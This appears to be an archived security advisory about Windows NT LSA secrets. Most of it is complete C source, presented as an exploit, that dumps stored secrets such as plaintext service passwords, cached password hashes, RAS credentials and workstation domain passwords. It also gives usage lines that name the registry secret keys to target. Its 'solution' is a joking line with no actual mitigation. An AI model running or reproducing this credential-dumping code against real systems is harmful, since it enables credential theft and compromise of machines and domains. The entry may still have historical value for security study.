COMMAND

    LSA

SYSTEMS AFFECTED

    Win NT

PROBLEM

    Paul  Ashton  posted  following.   Following  on  from the service
    password issue,  here's a  little program  that will  dump various
    LSA  secrets  such  as  service  passwords  (plain  text),  cached
    password hashes  of the  last users  to login  to a  machine, FTP,
    WEB,  etc.   plaintext  passwords,  RAS  dial  up  account  names,
    passwords etc, workstation passwords for domain access, etc.

    Run as: prog _sc_schedule [machine], prog nl$1, prog  w3_root_data
    or  any  other  registry  key  under NTLM\security\policy\secrets.
    Exploit follows:

    #include <windows.h>
    #include <stdio.h>

    #include "ntsecapi.h"
    #define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
    void write();

    PLSA_UNICODE_STRING
    str(LPWSTR x)
    {
        static LSA_UNICODE_STRING s;

        s.Buffer=x;
        s.Length=wcslen(x)*sizeof(WCHAR);
        s.MaximumLength = (wcslen(x)+1)*2;
        return &s;
    }

    int _cdecl
    main(int argc, char *argv[])
    {
        LSA_HANDLE pol;
        PLSA_UNICODE_STRING foo;
        LSA_OBJECT_ATTRIBUTES attrs;
        WCHAR keyname[256]=L"";
        WCHAR host[256]=L"";

        wsprintfW(keyname, L"%hS", argv[1]);
        if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
        memset(&attrs, 0, sizeof(attrs));
        AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
        AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
        write(1, foo->Buffer, foo->Length);
        LsaClose(pol);
        exit(0);
    }

SOLUTION

    mail [somone]@microsoft.com and ask kind them for help.